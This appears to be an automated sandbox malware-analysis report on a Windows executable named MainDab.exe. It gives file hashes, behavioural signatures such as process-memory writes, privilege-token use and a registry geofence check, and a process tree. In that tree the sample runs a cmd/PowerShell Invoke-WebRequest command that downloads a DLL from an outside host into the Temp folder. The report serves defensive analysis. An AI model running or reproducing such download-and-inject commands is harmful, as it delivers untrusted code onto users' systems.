Analysis
-
max time kernel
22s -
max time network
23s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
07-06-2024 08:11
Static task
static1
Behavioral task
behavioral1
Sample
MainDab.exe
Resource
win10v2004-20240508-en
General
-
Target
MainDab.exe
-
Size
3.4MB
-
MD5
61c8fbae47137392a395793c6389a7c3
-
SHA1
a5830825fdf83ebc0c3c71efa08f930ef28c1bac
-
SHA256
4e5eecfa5d74032e0e84be4735741c3c1487419de546904b1812bbbcdbe40d3d
-
SHA512
62205d56d2b8672663a903273f1e11af1e4d8c53a8511247d23d7669de7724a7a5e1d12a182f48e829608ed333f395f185a82758e1ddafb5b9a695b86a7c13e1
-
SSDEEP
49152:TbOtb7mvXnLg3yLA4rWpDoRvbLuzs2J3Y2pDSmalRS88cnR5MtAxToDF0BtSLR:WlsXnLmyLA1QvYs2Jo2oLAWoB0BK
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 41 4360 powershell.exe -
pid Process 4360 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation MainDab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 raw.githubusercontent.com 21 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 4360 powershell.exe 4360 powershell.exe 3040 MainDab.exe 3040 MainDab.exe 4360 powershell.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe 3040 MainDab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3040 MainDab.exe Token: SeDebugPrivilege 4360 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3040 MainDab.exe 3040 MainDab.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3040 wrote to memory of 1656 3040 MainDab.exe 93 PID 3040 wrote to memory of 1656 3040 MainDab.exe 93 PID 3040 wrote to memory of 1656 3040 MainDab.exe 93 PID 1656 wrote to memory of 4360 1656 cmd.exe 95 PID 1656 wrote to memory of 4360 1656 cmd.exe 95 PID 1656 wrote to memory of 4360 1656 cmd.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\MainDab.exe"C:\Users\Admin\AppData\Local\Temp\MainDab.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\AppData\Local\Temp\krnl.dll'2⤵
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -c Invoke-WebRequest -Uri 'https://k-storage.com/bootstrapper/files/krnl.dll' -OutFile 'C:\Users\Admin\AppData\Local\Temp\krnl.dll'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\4b89c369de7d4f81b79fda80f664f86f /t 4176 /p 30401⤵PID:2472
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82